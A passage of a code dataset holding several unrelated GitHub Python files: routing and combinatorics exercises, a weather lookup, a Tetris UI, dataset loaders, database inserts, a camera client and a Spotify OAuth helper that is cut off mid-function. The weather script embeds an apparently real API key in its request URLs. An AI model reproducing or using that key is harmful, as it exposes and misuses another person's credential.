Visualizing/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"37229991345","text":"# coding: UTF-8\nimport itertools\n\n\ntimeBount = [[0, 24], [1, 4], [4, 6], [1, 2],\n [4, 7], [3, 5.5], [2, 5], [5, 8], [1.5, 4]]\n\ntimeReload = [0, 1, 2, 1, 3, 2, 2.5, 3, 0.8]\n\nadj = [[0, 40, 60, 75, 90, 200, 100, 160, 80],\n [40, 0, 65, 40, 100, 50, 75, 110, 100],\n [60, 65, 0, 75, 100, 100, 75, 75, 75],\n [75, 40, 75, 0, 100, 50, 90, 90, 150],\n [90, 100, 100, 100, 0, 100, 75, 75, 100],\n [200, 50, 100, 50, 100, 0, 70, 90, 75],\n [100, 75, 75, 90, 75, 70, 0, 70, 100],\n [160, 110, 75, 90, 75, 90, 70, 0, 100],\n [80, 100, 75, 150, 100, 75, 100, 100, 0]]\n\n\ndef isTimeOk(source, target, timerange=None): # tested\n if timerange is None:\n timerange = timeBount[source]\n v = 50\n cost = adj[source][target] / v\n left = [0, 0]\n if timerange[0] + cost > timeBount[target][1]:\n return [-1, []]\n else:\n left[0] = max(timerange[0] + cost + timeReload[target],\n timeBount[target][0])\n if timerange[1] + cost < timeBount[target][0]:\n return [-1, []]\n else:\n left[1] = min(timerange[1] + cost + timeReload[target],\n timeBount[target][1])\n return [adj[source][target], left]\n\n\ndef seq_time(choice):\n res = dict()\n for seq in itertools.permutations(choice):\n distance = 0\n trange = [0, 24]\n flag = 1\n cir = list(seq)\n cir.insert(0, 0)\n cir.append(0)\n for i in range(len(cir) - 1):\n d, t = isTimeOk(cir[i], cir[i+1], trange)\n if d == -1:\n flag = 0\n break\n else:\n distance += d\n trange = t\n if flag:\n res[seq] = distance\n return res\n\n\ndef isOverWeight(choice, weight=8):\n \"\"\"若该 choice 中所有客户需要的总货物量不超过 weight,return True\"\"\"\n\n weight_demand = [0, 2, 1.5, 4.5, 3, 1.5, 4, 2.5, 3] # q\n total = 0\n for i in choice:\n total += weight_demand[i]\n return total > weight\n\n\ndef single_car(clients):\n \"\"\"存在一个全集,不管有多少量车,每一量车的送货方案都属于该集合\n\n 该集合中的元素需要满足 2 个条件:\n 1. 运送重量不超过载重量。\n 2. 所有客户都按时到达\n \"\"\"\n choices = [[]]\n for client in clients:\n new_choices = []\n for choice in choices:\n new_choice = [client]\n new_choice.extend(choice)\n if not isOverWeight(new_choice):\n new_choices.append(new_choice)\n choices.extend(new_choices)\n choices.remove([])\n return choices\n\n\ndef list2set(orig):\n res = set()\n for ele in orig:\n if isinstance(ele, list):\n res.update(list2set(ele))\n else:\n res.add(ele)\n return res\n\n\ndef multi_car(choices):\n \"\"\"calculate solutions of optional cars for choices sequence\"\"\"\n solutions = [[]]\n ok = []\n for choice in choices:\n new_solutions = []\n for solution in solutions:\n # drop if node repeated\n if len(list2set(choice) & list2set(solution)) is 0:\n new_solution = [choice]\n new_solution.extend(solution)\n if len(list2set(new_solution)) is 8:\n ok.append(new_solution)\n else:\n new_solutions.append(new_solution)\n solutions.extend(new_solutions)\n return ok\n","repo_name":"vivian-xu/snipmate","sub_path":"tspWithTime/tsp.py","file_name":"tsp.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27042729887","text":"def is_palindrome(phrase):\n \"\"\"Is phrase a palindrome?\n\n Return True/False if phrase is a palindrome (same read backwards and\n forwards).\n\n >>> is_palindrome('tacocat')\n True\n\n >>> is_palindrome('noon')\n True\n\n >>> is_palindrome('robert')\n False\n\n Should ignore capitalization/spaces when deciding:\n\n >>> is_palindrome('taco cat')\n True\n\n >>> is_palindrome('Noon')\n True\n \"\"\"\n lower_phrase = phrase.lower()\n letters = \"abcdefghijklmnopqrstuvwxyz\"\n listofpharase = [letter.lower()\n for letter in lower_phrase if letter in letters]\n list_reverse = listofpharase.copy()\n list_reverse.reverse()\n\n if (listofpharase == list_reverse):\n return True\n else:\n return False\n","repo_name":"JoeUnedu/Python-DS-Exercise","sub_path":"python-ds-practice/09_is_palindrome/is_palindrome.py","file_name":"is_palindrome.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1256580962","text":"import requests\n\nurl1 = 'http://api.weatherapi.com/v1/current.json?key=4cd5672383814ae0932211421231209&q=Wroclaw&aqi=no'\n\nmiasto = 'Berlin'\n\nurl2 = 'http://api.weatherapi.com/v1/current.json?key=4cd5672383814ae0932211421231209&q='+ miasto + '&aqi=no'\nresponse_var1 = requests.get(url2)\njson_var1 = response_var1.json()\n\n# print(json_var1)\n\ntemp_c = json_var1.get('current').get('temp_c')\nprint(temp_c)\n\naura = json_var1.get('current').get('condition').get('text')\nprint(aura)\n\nprint('Aktualna pogoda w', miasto , 'to:',aura,\". i mamy temperature\", temp_c, 'stopni celcjusza')\n\n#for ips in json_var1['current']:\n# print(f\"aktualna temperatura wynosi: {ips['temp_c']}\")\n# print(f\"aktualna pogoda jest: , {ips['condition']}\")","repo_name":"konradpawlak/plurarFund","sub_path":"pyPogoda/pogoda.py","file_name":"pogoda.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5230157539","text":"#Problem Link https://leetcode.com/problems/combination-sum/\n# Time complexity 2^n\nclass Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n final = []\n dp = []\n self.findCombinations(candidates, target, 0, dp, final)\n return final\n\n\n\n def findCombinations(self, a, target, index = 0, dp = [], final = []):\n if target < 0:\n return\n if index >= len(a):\n if target == 0:\n final.append(dp[:])\n return\n\n #take the current element\n dp.append(a[index])\n self.findCombinations(a,target-a[index], index, dp, final)\n\n #Dont take the current element and move forward\n dp.pop()\n self.findCombinations(a, target, index+1, dp, final)","repo_name":"ayushj95123/90DaysOfDSA","sub_path":"Recursion/CombinationSum.py","file_name":"CombinationSum.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9653980778","text":"# coding=utf-8\n\nimport sys\nimport random\nimport argparse\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nfrom main import Tetris\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--value_of_speed', default='300')\n\n\nclass UI(QMainWindow):\n def __init__(self, speed):\n super().__init__()\n self.speed = speed\n\n self.initUI() # edit the UI, using this function named initUI\n\n def initUI(self):\n # set the typeface\n QToolTip.setFont(QFont('SansSerif', 10))\n\n # tip for blank area\n self.setToolTip('This is a Tetris game')\n\n # play\n self.start = QPushButton('start', self)\n self.start.setToolTip('start the tetris game!')\n self.start.setGeometry(140, 150, 300, 20)\n\n # for child windows of start\n layout = QVBoxLayout()\n layout.addWidget(self.start)\n self.setLayout(layout)\n\n # set window size\n self.resize(600, 440)\n self.setWindowTitle('Teteris')\n # set the icon of this window, using the picture named tetris.jpg in this project.\n self.setWindowIcon(QIcon('tetris.jpg'))\n self.center()\n\n # show this window automatically\n self.show()\n\n # rewrite this function: have a new window to confirm whether people want to exit this game\n def closeEvent(self, event):\n\n reply = QMessageBox.question(self, 'Message',\n \"Are you sure to quit?\", QMessageBox.Yes |\n QMessageBox.No, QMessageBox.No)\n\n if reply == QMessageBox.Yes:\n event.accept()\n else:\n event.ignore()\n\n # center the window\n def center(self):\n\n # catch the window\n qr = self.frameGeometry()\n # get the center point\n cp = QDesktopWidget().availableGeometry().center()\n # print\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n\nif __name__ == '__main__':\n from AI_agent import TETRIS_AI\n args = parser.parse_args()\n # show windows, and create a correlation between these windows\n print(\"would you like to play this Tetris game? Type '1' or '0' please.\")\n choice = input()\n if choice == '1':\n print(\"would you like to watch AI playing? Type '1' or '0' please.\")\n watch = input()\n if watch == '1':\n ai = TETRIS_AI\n speed = 20\n else:\n ai = None\n speed = int(args.value_of_speed)\n app = QApplication(sys.argv)\n new = Tetris(speed, ai)\n ex = UI(speed)\n ex.start.clicked.connect(new.show)\n sys.exit(app.exec_())\n else:\n print(\"goodbye!\")\n","repo_name":"Uranussss/Retro_Game","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31805278051","text":"import os\nfrom queue import Queue\n\nimport pandas as pd\n\nfrom nltk.corpus import wordnet as wn\n\nimport networkx as nx\nfrom networkx.drawing.nx_pydot import graphviz_layout\n\nimport matplotlib.pyplot as plt\n\nIMAGENET_16_120 = False # for the 16-120 labels only\nDEBUG = 0\n\nwith open('imagenet_resized.labels', 'r') as f:\n labels = f.read().splitlines()\n\nif IMAGENET_16_120:\n labels = labels[:120]\nif DEBUG:\n labels = labels[:15]\n\n\ndef hyp(s):\n return s.hypernyms()\n\n\nedges = []\nleaves = []\n\nprint('put together graph')\nfor label in labels:\n pos = label[0]\n offset = int(label[1:])\n\n s = wn.synset_from_pos_and_offset(pos, offset)\n tree = s.tree(hyp)\n\n leaves.append(tree[0])\n\n q = Queue()\n q.put(tree)\n while not q.empty():\n line = q.get()\n child, parents = line[0], line[1:]\n for p in parents:\n edges.append((p[0].name(), child.name()))\n q.put(p)\n\ng = nx.DiGraph(edges)\n\nleaf_names = {leaf.name() for leaf in leaves}\ng_leaves = set(n for n in g.nodes() if g.out_degree(n) == 0)\nprint('This should be empty (non-leaf labels):',\n g_leaves ^ leaf_names)\n\n# stats: shortest distances between labels\ng_hash = nx.weisfeiler_lehman_graph_hash(g)\nprefix = 'imagenet_resized'\nif IMAGENET_16_120:\n prefix += '_120'\ndist_filename = f'{prefix}_label_distances_{g_hash}.csv'\n\nif os.path.isfile(dist_filename):\n print('read cached df')\n dist_df = pd.read_csv(dist_filename)\nelse:\n print('measure similarities')\n distances = []\n g_undirected = g.to_undirected()\n idx_is = [] # always less than j\n idx_js = []\n for i, leaf_i in enumerate(leaves):\n for leaf_j in leaves[i + 1:]:\n length = nx.shortest_path_length(g_undirected, leaf_i.name(),\n leaf_j.name())\n distances.append({\n 'label_i': leaf_i.name(),\n 'label_j': leaf_j.name(),\n 'nx_distance': length,\n 'path_sim': leaf_i.path_similarity(leaf_j),\n 'lch_sim': leaf_i.lch_similarity(leaf_j),\n 'wup_sim': leaf_i.wup_similarity(leaf_j),\n })\n idx_is.append(labels.index(\n leaf_i.pos() + f'{leaf_i.offset():08}'))\n idx_js.append(labels.index(\n leaf_j.pos() + f'{leaf_j.offset():08}'))\n\n mi = pd.MultiIndex.from_arrays([idx_is, idx_js], names=['idx_i', 'idx_j'])\n dist_df = pd.DataFrame(distances, index=mi)\n dist_df.to_csv(dist_filename, index=True)\n\nprint('sort')\ndist_df.sort_values(by='nx_distance', ignore_index=True, inplace=True)\nprint('ok printing')\nprint(dist_df.head(25).to_string(index=False))\nprint('...')\nprint(dist_df.tail(25).to_string(index=False))\nprint('Pearson Correlation')\nprint(dist_df.corr().to_string())\nprint('Spearman Correlation')\nprint(dist_df.corr('spearman').to_string())\n\npos = graphviz_layout(g, prog='twopi')\n\nnon_leaf = {*g.nodes()} - leaf_names\nnx.draw_networkx_nodes(g, pos, nodelist=leaf_names, node_shape='^',\n node_size=25, node_color='g')\nnx.draw_networkx_nodes(g, pos, nodelist=non_leaf, node_shape='o',\n node_size=25, node_color='b')\nnx.draw_networkx_edges(g, pos)\nnx.draw_networkx_labels(g, pos, verticalalignment='center',\n horizontalalignment='right',\n font_size=8)\n\nplt.show()\n","repo_name":"LLNL/XNAS","sub_path":"hierarchical_imagenet.py","file_name":"hierarchical_imagenet.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"23778207","text":"import numpy as np\nimport cv2, random\n\nfrom os.path import join\n\n\nclass WiderFaceDataset:\n def __init__(self, data_dir):\n self.data_dir = data_dir\n\n self._train_ls = self.load_file(\"wider_face_train_bbx_gt.txt\")\n self._val_ls = self.load_file(\"wider_face_val_bbx_gt.txt\")\n self._test_ls = self.load_file(\"wider_face_test_filelist.txt\")\n\n def load_file(self, file_name):\n result = []\n\n file_path = join(self.data_dir, \"wider_face_split\", file_name)\n if file_name == \"wider_face_test_filelist.txt\":\n return [line.strip() for line in open(file_path, \"r\").readlines()]\n\n with open(file_path, \"r\") as f:\n status = 0\n for line in f.readlines():\n line = line.strip()\n if status == 0:\n record = [line, []]\n status = 1\n continue\n\n if status == 1:\n count = int(line)\n status = 2\n continue\n\n if status == 2:\n record[1].append([int(s) for s in line.split(\" \")])\n count -= 1\n if count <= 0:\n result.append(record)\n status = 0\n continue\n\n return result\n\n def load_image(self, image_path):\n return cv2.imread(join(self.data_dir, image_path))\n\n def preprocess(self, img, rois):\n h, w, _ = img.shape\n scale = min(1024 / h, 1024 / w)\n img = cv2.resize(img, None, fx=scale, fy=scale)\n rois = rois * scale\n\n h, w, _ = img.shape\n canvas = np.zeros((1024, 1024, 3))\n canvas[:h, :w, :] = img\n\n return canvas, rois.astype(np.int)\n\n def train_data(self):\n random.shuffle(self._train_ls)\n for image_name, data in self._train_ls:\n image_path = join(\"WIDER_train\", \"images\", image_name)\n img = self.load_image(image_path)\n rois = np.array(data)[:, :4]\n yield self.preprocess(img, rois)\n\n def val_data(self):\n for image_name, data in self._val_ls:\n image_path = join(\"WIDER_val\", \"images\", image_name)\n img = self.load_image(image_path)\n rois = np.array(data)[:, :4]\n yield self.preprocess(img, rois)\n\n def test_data(self):\n for image_name, data in self._test_ls:\n image_path = join(\"WIDER_test\", \"images\", image_name)\n yield self.load_image(image_path)\n\n\nif __name__ == '__main__':\n dataset = WiderFaceDataset(\"/home/killf/data/数据集/wider_face\")\n for img, rois in dataset.train_data():\n for roi in rois:\n cv2.rectangle(img, (roi[0], roi[1]), (roi[0] + roi[2], roi[1] + roi[3]), (255, 255, 0))\n cv2.imwrite(\"0.jpg\", img)\n\n print(dataset)\n","repo_name":"killf/FaceDetection","sub_path":"dataset/wider_face.py","file_name":"wider_face.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70842538396","text":"import sys\nimport logging\n\nimport sqlalchemy as db\n\nimport settings\n\nfrom sqlalchemy import exc\nfrom sqlalchemy.types import Integer\nfrom sqlalchemy.types import Boolean\nfrom sqlalchemy.types import String\n\ndef conectar():\n \"\"\"\n Se encarga de realizar la conexión a la base de datos\n Inputs:\n None\n Ouput:\n Conexión a la BD\n \"\"\"\n usuario = settings.DATABASES['default']['USER']\n contrasena = settings.DATABASES['default']['PASSWORD']\n host = settings.DATABASES['default']['HOST']\n db_nombre = settings.DATABASES['default']['NAME']\n engine = db.create_engine('postgresql+psycopg2://'+ usuario +':' + contrasena + '@' + host +'/' + db_nombre)\n return engine\n\n# No hay mucho que documentar acá\n# Conexión\n# Normalizar tipos de datos\n# Corregir índices\ndef insertar_estadisticas_general(dataframe):\n \"\"\"\n Se encarga de insertar el dataframe normalizado en la base de datos\n Inputs:\n Dataframe normalizado\n Ouput:\n None\n \"\"\"\n engine = conectar()\n try:\n dataframe.to_sql(\n 'estadisticas_general',\n con=engine,\n if_exists='replace',\n index = False,\n dtype=\n {\n 'descripcion':String(),\n 'cantidad':Integer()\n }\n )\n except exc.SQLAlchemyError:\n logging.error('Error en la conexión a la base de datos')\n sys.exit('Error al conectar a la base de datos')\n\ndef insertar_estadisticas_cines(dataframe):\n \"\"\"\n Se encarga de insertar el dataframe de estadísticas de cines en la base de datos\n Inputs:\n Dataframe con estadísticas de cines\n Ouput:\n None\n \"\"\"\n engine = conectar()\n try:\n dataframe.to_sql(\n 'estadisticas_cines',\n con=engine,\n if_exists='replace',\n dtype=\n {\n 'provincia':String(),\n 'pantallas':Integer(),\n 'butacas':Integer(),\n 'cantidad_de_espacios_INCAA':Integer()\n }\n )\n except exc.SQLAlchemyError:\n logging.error('Error en la conexión a la base de datos')\n sys.exit('Error al conectar a la base de datos')\n\ndef insertar_datos_normalizados(dataframe):\n \"\"\"\n Se encarga de insertar el dataframe de estadísticas generales en la base de datos\n Inputs:\n Dataframe con estadísticas generales\n Ouput:\n None\n \"\"\"\n engine = conectar()\n try:\n dataframe.to_sql(\n 'locaciones',\n con=engine,\n if_exists='replace',\n dtype=\n {\n 'id_provincia':Integer(),\n 'cod_localidad':Integer(),\n 'provincia':String(),\n 'localidad':String(),\n 'nombre':String(),\n 'domicilio':String(),\n 'codigo_postal':String(),\n 'mail':String(),\n 'web':String(),\n 'fuente':String(),\n 'telefono':String(),\n 'id_departamento':Integer(),\n 'categoria':String()\n }\n )\n except exc.SQLAlchemyError:\n logging.error('Error en la conexión a la base de datos')\n sys.exit('Error al conectar a la base de datos')","repo_name":"hectornauta/DataCulture","sub_path":"conexion_db.py","file_name":"conexion_db.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"36084126625","text":"class NameEntry:\r\n def __init__(self,name,gender,count):\r\n self.name = name\r\n self.gender = gender\r\n self.count = count\r\n \r\nclass YearEntry:\r\n def __init__(self,names):\r\n self.entries = []\r\n for name_entry in names:\r\n self.add(name_entry)\r\n \r\n def add(self,name_entry):\r\n self.entries.append(name_entry)\r\n\r\ndef loadFileData(f):\r\n year_entry = YearEntry([]) # YearEntry() needs an argument so blank space for now\r\n lines = [line.strip() for line in f] # Strip whitespace from lines in file\r\n for line in lines:\r\n name,gender,count = line.split(',') # Split lines into name,gender,count\r\n ne = NameEntry(name,gender,int(count)) # name entry\r\n year_entry.add(ne)\r\n return year_entry\r\n\r\ndef loadAllData():\r\n start_year,finish_year = 1880,2016\r\n yr_data = dict()\r\n for yr in range(start_year,finish_year):\r\n path = 'D:\\\\names\\\\'\r\n filename = 'yob{}.txt'.format(yr)\r\n with open(path+filename,'r') as f:\r\n yr_data[yr] = loadFileData(f)\r\n return yr_data\r\n \r\n ","repo_name":"tangentino/Intro-Python","sub_path":"data_term1.py","file_name":"data_term1.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25271932562","text":"import tensorflow as tf\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import shuffle\nfrom decimal import Decimal, getcontext\nimport logging\nfrom load_logger import load_logger_conf\nfrom PIL import Image\nimport glob\nimport os\nimport sys\nimport time\nfrom generate_samples import save_plot\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nSEED = 12345\n\n#loads n number of samples form mnist with 80/20 split\ndef load_mist(n, fashion=False):\n if fashion:\n (train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.fashion_mnist.load_data()\n else:\n (train_images, train_labels), (test_images, test_labels) = tf.keras.datasets.mnist.load_data()\n x = np.concatenate((train_images, test_images))\n y = np.concatenate((train_labels, test_labels))\n x = x.reshape((x.shape[0], 28, 28, 1)).astype('float32')\n y = y.reshape(y.shape[0], 1).astype('float32')\n\n gen_train_images = train_images.reshape((train_images.shape[0], 28, 28, 1)).astype('float32')\n gen_train_labels = train_labels.reshape(train_labels.shape[0], 1).astype('float32')\n gen_test_images = test_images.reshape((test_images.shape[0], 28, 28, 1)).astype('float32')\n gen_test_labels = test_labels.reshape(test_labels.shape[0], 1).astype('float32')\n # gan uses only training set vae also uses test set\n # train_size = 0.8\n # #use decimal since 1-0.8 is 0.199999999 due to float inprecision\n # getcontext().prec = 3\n # test_size = float(Decimal(1)-Decimal(train_size))\n if n < gen_train_images.shape[0]:\n gen_train_images, throwaway_images, gen_train_labels, throwaway_labels = train_test_split(gen_train_images, gen_train_labels, train_size=n, random_state=SEED, shuffle=True, stratify=gen_train_labels)\n # fetch only n elements so that len(train_images)+len(test_images) = n\n # train_n = int((n/100)*(train_size*100))\n # test_n = int((n/100.)*(test_size*100))\n gen_train_images = gen_train_images[:n]\n gen_train_labels = gen_train_labels[:n]\n\n # gen_test_images = gen_test_images[:test_n]\n # gen_test_labels = gen_test_labels[:test_n]\n # test_labels_onehot = np.zeros((test_labels.size, test_labels.max()+1))\n # test_labels_onehot[np.arange(test_labels.size), test_labels] = 1\n logging.info('Created train test split of {} train elements and {} test elements'.format(gen_train_images.shape[0], gen_test_images.shape[0]))\n\n # Normalization\n # for GAN\n gen_train_images_gan = (gen_train_images - 127.5) / 127.5\n gen_test_images_gan = (gen_test_images - 127.5) / 127.5\n\n # for VAE\n gen_train_images_vae = gen_train_images / 255.\n gen_test_images_vae = gen_test_images / 255.\n # for Classifier\n train_images_cl = gen_train_images / 255.\n test_images_cl = gen_test_images / 255.\n\n dataset = {}\n dataset['train_data_gan'] = [gen_train_images_gan, gen_train_labels]\n dataset['test_data_gan'] = [gen_test_images_gan, gen_test_labels]\n\n dataset['train_data_vae'] = [gen_train_images_vae, gen_train_labels]\n dataset['test_data_vae'] = [gen_test_images_vae, gen_test_labels]\n\n dataset['train_data_cl'] = [train_images_cl, onehot_encode(gen_train_labels)]\n dataset['test_data_cl'] = [test_images_cl, onehot_encode(gen_test_labels)]\n return dataset\n\ndef load_generated_imgs(img_path):\n image_list = []\n y = []\n for i in range(10):\n for filename in glob.glob(img_path+'label_{}/*.png'.format(i)):\n im=Image.open(filename)\n image_list.append(im.copy())\n im.close()\n y.append(i)\n x = np.array(list(map(np.asarray, image_list)))\n y = np.array(y)\n x = x.reshape((x.shape[0], 28, 28, 1)).astype('float32')\n y = y.reshape(y.shape[0], 1).astype('float32')\n # x, y = shuffle(x, y, random_state=SEED)\n # Normalization \n x /= 255.\n dataset = {}\n dataset['cl_train_data'] = [x, onehot_encode(y)]\n return dataset\n\ndef onehot_encode(labels, num_classes=10):\n labels = labels.astype(np.uint8)\n targets = np.array(labels).reshape(-1)\n labels_onehot = np.eye(num_classes)[targets]\n return labels_onehot\n\ndef load_classifier_data(train_dataset, test_dataset, img_path=None, gen=True, number_aug=None, imgs_paths=None):\n dataset = {}\n if gen:\n if img_path == None:\n # augmented data\n train_time, gen_time, augmented_data = mnist_augmented(train_dataset[0], train_dataset[1], number_aug, imgs_paths)\n generated_data = augmented_data\n else:\n # generated data\n generated_data = load_generated_imgs(img_path)\n x_train = np.concatenate((generated_data['cl_train_data'][0], train_dataset[0]))\n y_train = np.concatenate((generated_data['cl_train_data'][1], train_dataset[1]))\n x_test = test_dataset[0]\n y_test = test_dataset[1]\n dataset['cl_train_data'] = shuffle(x_train, y_train, random_state=SEED)\n dataset['cl_test_data'] = [x_test, y_test]\n else:\n x_train = train_dataset[0]\n y_train = train_dataset[1]\n x_test = test_dataset[0]\n y_test = test_dataset[1]\n dataset['cl_train_data'] = shuffle(x_train, y_train, random_state=SEED)\n dataset['cl_test_data'] = [x_test, y_test]\n if img_path == None and gen == True:\n return train_time, gen_time, dataset\n return dataset\n\ndef mnist_augmented(x_train, y_train, augment_size, imgs_paths):\n image_generator = ImageDataGenerator(\n rotation_range=10,\n zoom_range = 0.05, \n width_shift_range=0.05,\n height_shift_range=0.05,\n horizontal_flip=False,\n vertical_flip=False)\n # go through labels and generate for each label individually to preserve balance\n result_x = np.empty((0, 28, 28, 1))\n result_y = np.empty((0, 10))\n train_time = 0\n gen_time = 0\n for i in range(10):\n l = float(i)\n # print(l)\n lab = y_train\n # turn onehot encoded labels into numeric\n lab_numeric = np.array([np.where(r==1.)[0][0] for r in lab])\n ind = np.where(lab_numeric==l)\n print(len(ind[0]))\n sliced_x = np.copy(x_train[ind, ])\n sliced_y = np.copy(y_train[ind, ])\n sliced_x = sliced_x.reshape((sliced_x.shape[1], 28, 28, 1)).astype('float32')\n sliced_y = sliced_y.reshape((sliced_y.shape[1], 10)).astype('float32')\n # print('Sliced_x shape: {}'.format(sliced_x.shape))\n # print('Sliced_y shape: {}'.format(sliced_y.shape))\n # fit data for zca whitening\n train_time_start = time.time()\n image_generator.fit(sliced_x, augment=True, seed=SEED)\n train_time_end = time.time()\n train_time += (train_time_end-train_time_start)\n # get transformed images\n gen_time_start = time.time()\n randidx = np.random.randint(sliced_x.shape[0], size=augment_size)\n x_augmented = sliced_x[randidx].copy()\n y_augmented = sliced_y[randidx].copy()\n x_augmented = image_generator.flow(x_augmented, np.zeros(augment_size),\n batch_size=augment_size, shuffle=False).next()[0]\n imgs_path = imgs_paths[i]\n save_plot(x_augmented, 'AUG', imgs_path, i)\n gen_time_end = time.time()\n gen_time += (gen_time_end-gen_time_start)\n # print('x_augment shape: {}'.format(x_augmented.shape))\n # print('y_augment shape: {}'.format(y_augmented.shape))\n #display_image_from_array(x_augmented[0])\n result_x = np.concatenate((result_x, x_augmented))\n result_y = np.concatenate((result_y, y_augmented))\n # print('Result_x array shape: {}'.format(result_x.shape))\n # print('Result_y array shape: {}'.format(result_y.shape))\n dataset = {}\n dataset['cl_train_data'] = [result_x, result_y]\n return train_time, gen_time, dataset\n\ndef display_image_from_array(arr):\n img = Image.fromarray((arr*255).reshape((28,28)).astype(np.uint8))\n img.show()\n\nif __name__ == \"__main__\":\n # img_path = './runs/run_1/cycles/cycle_1/vae_imgs/'\n # load_generated_imgs(img_path)\n #mnist_augmented()\n load_mist(25600, fashion=False)\n ","repo_name":"chineduobadigbo/data_aug_comparison","sub_path":"load_mnist.py","file_name":"load_mnist.py","file_ext":"py","file_size_in_byte":8219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"29306991742","text":"import cv2\nfrom config_utils import Config\nfrom socket_client import Client\nfrom json import loads\nfrom random import randint\n\nconfig = Config()\nvideo_server_host, video_server_port = config.get_video_server_config()\ndata_center_host, data_center_port = config.get_data_center_config()\n\ncamera_host = config.get_value(\"camera_host\")\n\nimage_quality = config.get_value(\"image_quality\")\n\nclient_of_data_center = Client(data_center_host, data_center_port)\nclient_of_data_center.connect()\nclient_of_video_server = Client(video_server_host, video_server_port)\nclient_of_video_server.connect()\n\n\ndef capture(camera_id, camera_host, image_quality):\n if camera_host == \"0\":\n camera_host = 0\n cap = cv2.VideoCapture(camera_host)\n while True:\n ret, frame = cap.read()\n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), image_quality]\n image = cv2.imencode('.jpg', frame, encode_param)[1]\n image_byte = image.tobytes()\n client_of_video_server.send_to_video_server(camera_id, 50, image_byte)\n\n\nif __name__ == \"__main__\":\n register = {\n \"data_type\": 50,\n \"camera_host\": camera_host\n }\n client_of_data_center.send_to_data_center(register)\n message_bytes = client_of_data_center.conn.recv(1024)\n message_str = message_bytes.decode()\n message_json = loads(message_str)\n use_mysql = message_json[\"use_mysql\"]\n if use_mysql:\n camera_id = message_json[\"camera_id\"]\n text = \"监控摄像机在数据中心注册成功,当前设备ID: {}\"\n else:\n camera_id = randint(65535, 70000)\n text = \"当前数据中心未连接至mysql,设备无法获取正确ID,已经为监控摄像机分配临时ID: {}供测试使用\"\n print(text.format(camera_id, camera_host))\n capture(camera_id, camera_host, image_quality)\n","repo_name":"kanyuanzhi/TouchAll-VideoCapture","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10641485241","text":"import webbrowser\nimport secrets, hashlib, base64\nimport urllib.parse, urllib.error\nimport json, web\nimport os.path, shelve, tempfile\nimport time\n\nCLIENT_ID = '46e6abb3cb0448ee88ae176a5b2d9c4b'\nPORT = 8080\n\nasync def auth():\n chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_.-~'\n verifier = ''.join(secrets.choice(chars) for _ in range(64))\n challenge = base64.urlsafe_b64encode(hashlib.sha256(verifier.encode()).digest())\n challenge = challenge.decode().rstrip('=')\n\n query = urllib.parse.urlencode({\n 'client_id': CLIENT_ID,\n 'response_type': 'code',\n 'redirect_uri': f'http://localhost:{PORT}',\n 'code_challenge_method': 'S256',\n 'code_challenge': challenge,\n 'scope': 'user-read-currently-playing',\n })\n\n webbrowser.open(f'https://accounts.spotify.com/authorize?{query}')\n response = await web.serve(PORT)\n query = urllib.parse.parse_qs(urllib.parse.urlparse(response.path).query)\n if 'error' in query:\n return None\n\n query = urllib.parse.urlencode({\n 'client_id': CLIENT_ID,\n 'grant_type': 'authorization_code',\n 'code': query['code'][0],\n 'redirect_uri': f'http://localhost:{PORT}',\n 'code_verifier': verifier,\n })\n\n data = await web.open('https://accounts.spotify.com/api/token', query.encode())\n return json.loads(data.decode())\n\nasync def refresh(refresh_token):\n query = urllib.parse.urlencode({\n 'grant_type': 'refresh_token',\n 'refresh_token': refresh_token,\n 'client_id': CLIENT_ID,\n })\n\n data = await web.open('https://accounts.spotify.com/api/token', query.encode())\n return json.loads(data.decode())\n\nasync def try_open(access_token, url, data):\n headers = { 'Authorization': f'Bearer {access_token}' }\n return await web.open(url, data, headers)\n\nasync def open(url, data=None):\n path = tempfile.gettempdir()\n path = os.path.join(path, 'spotify')\n\n with shelve.open(path) as db:\n do_refresh = False\n do_refresh = do_refresh or 'access_token' not in db\n do_refresh = do_refresh or 'expires_at' not in db\n do_refresh = do_refresh or time.time() > db['expires_at'] - 60\n\n if not do_refresh:\n try:\n return await try_open(db['access_token'], url, data)\n except:\n do_refresh = True\n\n do_auth = False\n do_auth = do_auth or 'refresh_token' not in db\n\n if not 